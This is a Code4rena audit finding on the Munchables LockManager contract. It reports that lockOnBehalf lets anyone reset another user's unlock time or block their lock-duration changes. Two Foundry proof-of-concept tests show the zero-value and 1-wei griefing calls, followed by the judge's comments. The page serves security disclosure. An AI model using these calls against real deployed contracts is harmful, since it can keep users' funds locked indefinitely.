Platform: Code4rena
Start Date: 22/05/2024
Pot Size: $20,000 USDC
Total HM: 6
Participants: 126
Period: 5 days
Judge: 0xsomeone
Total Solo HM: 1
Id: 379
League: ETH
Rank: 64/126
Findings: 1
Award: $0.01
🌟 Selected for report: 1
🚀 Solo Findings: 0
🌟 Selected for report: Circolors
Also found by: 0rpse, 0x175, 0xAadi, 0xHash, 0xMax1mus, 0xMosh, 0xblack_bird, 0xdice91, 0xfox, 0xhacksmithh, 0xloscar01, 0xrex, 4rdiii, Audinarey, AvantGard, Bigsam, DPS, Dots, Drynooo, Dudex_2004, Evo, Kaysoft, King_, Limbooo, MrPotatoMagic, PENGUN, Sabit, SovaSlava, SpicyMeatball, TheFabled, Utsav, Varun_05, Walter, adam-idarrha, araj, aslanbek, ayden, bctester, biakia, bigtone, brgltd, carrotsmuggler, cats, crypticdefense, dd0x7e8, dhank, fandonov, fyamf, grearlake, iamandreiski, ilchovski, jasonxiale, joaovwfreire, lanrebayode77, m4ttm, merlinboii, niser93, nnez, octeezy, oxchsyston, pamprikrumplikas, rouhsamad, tedox, trachev, turvy_fuzz, twcctop, yotov721, zhaojohnson
0.0073 USDC - $0.01
https://github.com/code-423n4/2024-05-munchables/blob/main/src/managers/LockManager.sol#L275
The protocol allows users to donate ether and/or tokens to another user via a lockOnBehalf function. This function lets the caller specify which address should be the recipient of these funds. However issues araise because the lockOnBehalf deposit resets the receivers lockedToken.unlockTime pushing the users unlock time for that token further back.
The code in question:
lockedToken.unlockTime = uint32(block.timestamp) + uint32(_lockDuration);
Therefore if a user has already locked tokens in the protocol, a malicious user can repeatedly call lockOnBehalf shortly before the current unlockTime and keep delaying the users ability to withdraw their tokens. This is compounded by the fact that the lockOnBehalf function has no minimum _quantity therefore the attacker doesn't have to give up any of their own tokens to acheive this.
Alternatively, this attack vector can also be used to deny a users ability to decrease their minimum lock duration. In this instance, the attacker would have to call lockOnBehalf with a non zero amount, meaning the following check in setLockDuration would cause a revert and stop the user from decreasing their lock duration:
if ( uint32(block.timestamp) + uint32(_duration) < lockedTokens[msg.sender][tokenContract].unlockTime ) { revert LockDurationReducedError(); }
The following tests outline both of these attack vectors.
The tests can be copied into the MunchablesTest foundry test suite.
Testing the lockDuration extension grief:
address alice = makeAddr("alice"); address bob = makeAddr("bob"); function test_lockOnBehalfExtendsRecipientsUnlockTime() public { // Alice locks 10 ether in the protocol vm.deal(alice, 10 ether); vm.startPrank(alice); amp.register(MunchablesCommonLib.Realm.Everfrost, address(0)); lm.lock{value: 10 ether}(address(0), 10 ether); vm.stopPrank(); ILockManager.LockedTokenWithMetadata[] memory locked = lm.getLocked(address(alice)); uint256 firstUnlockTime = locked[0].lockedToken.unlockTime; console.log("Unlock Time Start:", firstUnlockTime); // Some time passes vm.warp(block.timestamp + 5 hours); // Bob makes a zero deposit "on behalf" of alice vm.startPrank(bob); lm.lockOnBehalf(address(0), 0, alice); ILockManager.LockedTokenWithMetadata[] memory lockedNow = lm.getLocked(address(alice)); uint256 endUnlockTime = lockedNow[0].lockedToken.unlockTime; // Confirm Alice's unlock time has been pushed back by bobs deposit console.log("Unlock Time End :", endUnlockTime); assert(endUnlockTime > firstUnlockTime); }
This produces the following logs outlining the change in lock time:
Unlock Time Start: 86401 Unlock Time End : 104401
Testing the setLockDuration grief:
function test_lockOnBehalfGriefSetLockDuration() public { // Alice plans to call LockManager::setLockDuration to lower her min lock time to 1 hour vm.startPrank(alice); amp.register(MunchablesCommonLib.Realm.Everfrost, address(0)); vm.stopPrank(); // However Bob makes a 1 wei dontation lockOnBehalf beforehand vm.startPrank(bob); vm.deal(bob, 1); lm.lockOnBehalf{value: 1}(address(0), 1, alice); vm.stopPrank(); // Now Alice's setter fails because her new duration is shorter than the `lockdrop.minDuration` set during bob's lockOnBehalf vm.startPrank(alice); vm.expectRevert(); lm.setLockDuration(1 hours); }
Other users having the power to extend a user's lock duration is inherently dangerous. The protocol should seriously consider whether the lockOnBehalf functionality is necessary outside of being used by the MigrationManager contract.
If it is decided that the team wishes for the project to retain the ability for users to "donate" tokens to other users there are a number approaches they can consider:
Other
#0 - c4-judge
2024-06-05T12:27:46Z
alex-ppg marked the issue as primary issue
#1 - c4-judge
2024-06-05T12:27:50Z
alex-ppg marked the issue as selected for report
#2 - c4-judge
2024-06-05T12:56:25Z
alex-ppg marked the issue as satisfactory
#3 - alex-ppg
2024-06-05T12:56:31Z
The submission and its duplicates have demonstrated how a lack of access control in the LockManager::lockOnBehalfOf function can lead to infinite locks and can sabotage lock duration changes.
This submission has been selected as the best given that it outlines both risks inherent to the lack of access control clearly and concisely while providing recommendations that align with best practices.
Submissions awarded with a 75% reward (i.e. penalized by 25%) either propose a mitigation that is incorrect or outline the lock duration adjustment problem which is of lower severity.
Submissions awarded with a 25% reward (i.e. penalized by 75%) are QA-reported issues that were improperly submitted as low-risk.